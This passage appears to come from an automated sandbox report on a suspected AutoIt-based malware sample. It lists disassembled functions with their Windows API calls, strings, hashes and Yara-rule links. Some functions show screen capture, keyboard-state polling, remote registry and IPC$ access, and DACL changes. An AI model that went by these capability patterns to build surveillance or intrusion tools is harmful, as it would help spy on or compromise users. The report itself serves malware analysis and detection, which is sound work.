                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                            • String ID: *.*
                                            • API String ID: 34673085-438819550
                                            • Opcode ID: 5d785531a7ec4fe6de3c4d4d85f3171ac668175e51d9c611cc671d7dd49d4c42
                                            • Instruction ID: 8486b7cfc90390f9435bb9916d0998d04b91e172b394fdf01d7936c12751782e
                                            • Opcode Fuzzy Hash: 5d785531a7ec4fe6de3c4d4d85f3171ac668175e51d9c611cc671d7dd49d4c42
                                            • Instruction Fuzzy Hash: 53817F715043059FCB24DF68C8459AAB7E8FF98315F14882EFC89D7251EB34E9588F92
                                            Function 0086EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0086EF3B
                                            • GetFocus.USER32 ref: 0086EF4B
                                            • GetDlgCtrlID.USER32(00000000), ref: 0086EF56
                                            • _memset.LIBCMT ref: 0086F081
                                            • GetMenuItemInfoW.USER32 ref: 0086F0AC
                                            • GetMenuItemCount.USER32(00000000), ref: 0086F0CC
                                            • GetMenuItemID.USER32(?,00000000), ref: 0086F0DF
                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0086F113
                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0086F15B
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0086F193
                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0086F1C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                            • String ID: 0
                                            • API String ID: 1296962147-4108050209
                                            • Opcode ID: b0040f56175dbb95a76164e699eeb2a0fa543d362b51c52ef74296435be06321
                                            • Instruction ID: db3e606626f83f4487335baa6da220db95f180368cf138c00226a70a4aab978c
                                            • Opcode Fuzzy Hash: b0040f56175dbb95a76164e699eeb2a0fa543d362b51c52ef74296435be06321
                                            • Instruction Fuzzy Hash: 4A818A71104305AFDB21CF18D884E6BBBE9FB89354F11492EFA94D7292DB30D905CBA2
                                            Function 0083A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0083ABD7
                                              • Part of subcall function 0083ABBB: GetLastError.KERNEL32(?,0083A69F,?,?,?), ref: 0083ABE1
                                              • Part of subcall function 0083ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0083A69F,?,?,?), ref: 0083ABF0
                                              • Part of subcall function 0083ABBB: HeapAlloc.KERNEL32(00000000,?,0083A69F,?,?,?), ref: 0083ABF7
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0083AC0E
                                              • Part of subcall function 0083AC56: GetProcessHeap.KERNEL32(00000008,0083A6B5,00000000,00000000,?,0083A6B5,?), ref: 0083AC62
                                              • Part of subcall function 0083AC56: HeapAlloc.KERNEL32(00000000,?,0083A6B5,?), ref: 0083AC69
                                              • Part of subcall function 0083AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0083A6B5,?), ref: 0083AC7A
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0083A8CB
                                            • _memset.LIBCMT ref: 0083A8E0
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0083A8FF
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A910
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0083A94D
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0083A969
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A986
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0083A995
                                            • HeapAlloc.KERNEL32(00000000), ref: 0083A99C
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0083A9BD
                                            • CopySid.ADVAPI32(00000000), ref: 0083A9C4
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0083A9F5
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0083AA1B
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0083AA2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 40675b2a0ee8d1fd6a9eb8d8ddd4855ee8fde6d801c0c88ef335633e881428fc
                                            • Instruction ID: 0d6f4ef2341e8bc7cc14a78fa68b0130cedbc81f448c7c21f9c56c1e881fb37c
                                            • Opcode Fuzzy Hash: 40675b2a0ee8d1fd6a9eb8d8ddd4855ee8fde6d801c0c88ef335633e881428fc
                                            • Instruction Fuzzy Hash: 2C515A75900219AFDF14DF94DC84EEEBBB9FF44310F048119E855EA290DB359A05CBA1
                                            Function 00859DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(00000000), ref: 00859E36
                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00859E42
                                            • CreateCompatibleDC.GDI32(?), ref: 00859E4E
                                            • SelectObject.GDI32(00000000,?), ref: 00859E5B
                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00859EAF
                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00859EEB
                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00859F0F
                                            • SelectObject.GDI32(00000006,?), ref: 00859F17
                                            • DeleteObject.GDI32(?), ref: 00859F20
                                            • DeleteDC.GDI32(00000006), ref: 00859F27
                                            • ReleaseDC.USER32(00000000,?), ref: 00859F32
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                            • String ID: (
                                            • API String ID: 2598888154-3887548279
                                            • Opcode ID: db1f54312c93caa02cbf21f974756726a5628bfe43ded2b426a6bb6c0c05dd43
                                            • Instruction ID: 9381692d58d09804af7c80838a14a408ea0cfed2b5fae9e5c566e18153e2470b
                                            • Opcode Fuzzy Hash: db1f54312c93caa02cbf21f974756726a5628bfe43ded2b426a6bb6c0c05dd43
                                            • Instruction Fuzzy Hash: 8C513775900309EFCB14CFA8C889EAEBBB9FF48711F14841DF99AA7250D771A9458B90
                                            Function 0084CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                            • API String ID: 2889450990-2391861430
                                            • Opcode ID: 5c3c66faf1b81ec8b83ea023e4a23e400d7eab278a05d6e66babae46d21fdeb0
                                            • Instruction ID: 00de80ebb82cd3d70975cb9ca8925ccca60b6986917a32a6ae6d3daaaea586f4
                                            • Opcode Fuzzy Hash: 5c3c66faf1b81ec8b83ea023e4a23e400d7eab278a05d6e66babae46d21fdeb0
                                            • Instruction Fuzzy Hash: 98517B71900209AACF55EBA8DD96EEEB778FF08304F100165F505B21A2EB306F59DF62
                                            Function 0084CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                            • API String ID: 2889450990-3420473620
                                            • Opcode ID: 2f6d778ab72041215cd89788c86c20d5533db4f079a97d246a2d4bd082ba736f
                                            • Instruction ID: ac9dc419c57cad9b61420f5a6481d27297d4e9881439c8e4c515941cda3220b9
                                            • Opcode Fuzzy Hash: 2f6d778ab72041215cd89788c86c20d5533db4f079a97d246a2d4bd082ba736f
                                            • Instruction Fuzzy Hash: 62519B71900219AACF54EBE8DD86EEEB778FF04344F100165B505B21A2EB346F59DFA2
                                            Function 008455BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 008455D7
                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00845664
                                            • GetMenuItemCount.USER32(008C1708), ref: 008456ED
                                            • DeleteMenu.USER32(008C1708,00000005,00000000,000000F5,?,?), ref: 0084577D
                                            • DeleteMenu.USER32(008C1708,00000004,00000000), ref: 00845785
                                            • DeleteMenu.USER32(008C1708,00000006,00000000), ref: 0084578D
                                            • DeleteMenu.USER32(008C1708,00000003,00000000), ref: 00845795
                                            • GetMenuItemCount.USER32(008C1708), ref: 0084579D
                                            • SetMenuItemInfoW.USER32(008C1708,00000004,00000000,00000030), ref: 008457D3
                                            • GetCursorPos.USER32(?), ref: 008457DD
                                            • SetForegroundWindow.USER32(00000000), ref: 008457E6
                                            • TrackPopupMenuEx.USER32(008C1708,00000000,?,00000000,00000000,00000000), ref: 008457F9
                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00845805
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                            • String ID:
                                            • API String ID: 3993528054-0
                                            • Opcode ID: 21095f1cf4b57b6396629c3ecdce7cc1c464f9e7aa8d03e9b25560287ee171b4
                                            • Instruction ID: fb7985ccf9e9fb7fde824c212c45e88b57aa48406be85b1c0be4e293a2cc5206
                                            • Opcode Fuzzy Hash: 21095f1cf4b57b6396629c3ecdce7cc1c464f9e7aa8d03e9b25560287ee171b4
                                            • Instruction Fuzzy Hash: 3871F170641A1DBFEB209B18CC49FAEBF65FB10368F240216F619EA1D2C7716C10DB91
                                            Function 0083A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0083A1DC
                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0083A211
                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0083A22D
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0083A249
                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0083A273
                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0083A29B
                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083A2A6
                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083A2AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                            • API String ID: 1687751970-22481851
                                            • Opcode ID: 80d2095ca4afba0422ebeb1f6de10ab9080909558ac5d6766fbbf904af301c0e
                                            • Instruction ID: 714a3a9dfc01205dcc1dc093b4295bbaa2770560b154c1eea8227679e3c7c50e
                                            • Opcode Fuzzy Hash: 80d2095ca4afba0422ebeb1f6de10ab9080909558ac5d6766fbbf904af301c0e
                                            • Instruction Fuzzy Hash: C141E975C10229AADB25EBA8DC95DEEB778FF04310F004129F811E32A1EB709D15CBA1
                                            Function 00863C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                            • API String ID: 3964851224-909552448
                                            • Opcode ID: 74a9c0a2b6f86df265f2b44c1d75fd1bbc17598778bafe3ffcbf740433719b5e
                                            • Instruction ID: f00b7216507984483ff0ccf059b8cfe2985bb9ff0dd67a985e63d7bf469342eb
                                            • Opcode Fuzzy Hash: 74a9c0a2b6f86df265f2b44c1d75fd1bbc17598778bafe3ffcbf740433719b5e
                                            • Instruction Fuzzy Hash: 68414D3011024B8BDF10EF58DC52AEA3365FF22350F115814FD69EB292EB70AE9ACB51
                                            Function 008425B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008736F4,00000010,?,Bad directive syntax error,0089DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008425D6
                                            • LoadStringW.USER32(00000000,?,008736F4,00000010), ref: 008425DD
                                            • _wprintf.LIBCMT ref: 00842610
                                            • __swprintf.LIBCMT ref: 00842632
                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008426A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                            • API String ID: 1080873982-4153970271
                                            • Opcode ID: 28ef56202a16895300b125fb444b8dfa8fb65c292966131ad3e9f42a9c50c6f9
                                            • Instruction ID: 7360e2c1c6ce428993daf47e57715c6a1bf7248ae1b61d2f72c39f44878dd5d0
                                            • Opcode Fuzzy Hash: 28ef56202a16895300b125fb444b8dfa8fb65c292966131ad3e9f42a9c50c6f9
                                            • Instruction Fuzzy Hash: C6214D3180021EBFCF11AF94DC4AEEE7B79FF18304F040455F515A62A2EA75AA58DB61
                                            Function 00847AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00847B42
                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00847B58
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00847B69
                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00847B7B
                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00847B8C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: SendString
                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                            • API String ID: 890592661-1007645807
                                            • Opcode ID: a927656612467ec77ae160d296e999bbf627a751cb721f4bf695545319e241ea
                                            • Instruction ID: b6ecbe1343451835ff40e1580c428d7ea16d16b62f0f5e32825b0374e04d9ad5
                                            • Opcode Fuzzy Hash: a927656612467ec77ae160d296e999bbf627a751cb721f4bf695545319e241ea
                                            • Instruction Fuzzy Hash: 4C1194F165026D79E760B769CC4ADFF7A7CFF91B10F0005297421E22D1EE601A49CAB1
                                            Function 0084778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • timeGetTime.WINMM ref: 00847794
                                              • Part of subcall function 0081DC38: timeGetTime.WINMM(?,76C1B400,008758AB), ref: 0081DC3C
                                            • Sleep.KERNEL32(0000000A), ref: 008477C0
                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 008477E4
                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00847806
                                            • SetActiveWindow.USER32 ref: 00847825
                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00847833
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00847852
                                            • Sleep.KERNEL32(000000FA), ref: 0084785D
                                            • IsWindow.USER32 ref: 00847869
                                            • EndDialog.USER32(00000000), ref: 0084787A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                            • String ID: BUTTON
                                            • API String ID: 1194449130-3405671355
                                            • Opcode ID: 14dcc76b9f405b0f6b52f96a93d15704c6c7d38751f6c72fe998af9c9b372483
                                            • Instruction ID: dcaf973e378a93316467daff788a92a3c0829d428be040bbd16c19974a855cd2
                                            • Opcode Fuzzy Hash: 14dcc76b9f405b0f6b52f96a93d15704c6c7d38751f6c72fe998af9c9b372483
                                            • Instruction Fuzzy Hash: 712158B020434DAFE7005BB8FC89E6A3F39FB48349B008425F506C62A2DF759C06DB65
                                            Function 008502EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CoInitialize.OLE32(00000000), ref: 0085034B
                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008503DE
                                            • SHGetDesktopFolder.SHELL32(?), ref: 008503F2
                                            • CoCreateInstance.OLE32(0088DA8C,00000000,00000001,008B3CF8,?), ref: 0085043E
                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008504AD
                                            • CoTaskMemFree.OLE32(?,?), ref: 00850505
                                            • _memset.LIBCMT ref: 00850542
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0085057E
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008505A1
                                            • CoTaskMemFree.OLE32(00000000), ref: 008505A8
                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008505DF
                                            • CoUninitialize.OLE32(00000001,00000000), ref: 008505E1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                            • String ID:
                                            • API String ID: 1246142700-0
                                            • Opcode ID: a071a40cd7bd2d643d13dba4de703c9b841b07f5b953135f02b119ac13823341
                                            • Instruction ID: 345c59c87e5fc0b5776ff5ea5ce99161a928fa08545d1e7f3f2743dfc3748227
                                            • Opcode Fuzzy Hash: a071a40cd7bd2d643d13dba4de703c9b841b07f5b953135f02b119ac13823341
                                            • Instruction Fuzzy Hash: C6B1D975A00209AFDB14DFA8C888DAEBBB9FF48305B1484A9F905EB251DB70ED45CF51
                                            Function 00842E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00842ED6
                                            • SetKeyboardState.USER32(?), ref: 00842F41
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00842F61
                                            • GetKeyState.USER32(000000A0), ref: 00842F78
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00842FA7
                                            • GetKeyState.USER32(000000A1), ref: 00842FB8
                                            • GetAsyncKeyState.USER32(00000011), ref: 00842FE4
                                            • GetKeyState.USER32(00000011), ref: 00842FF2
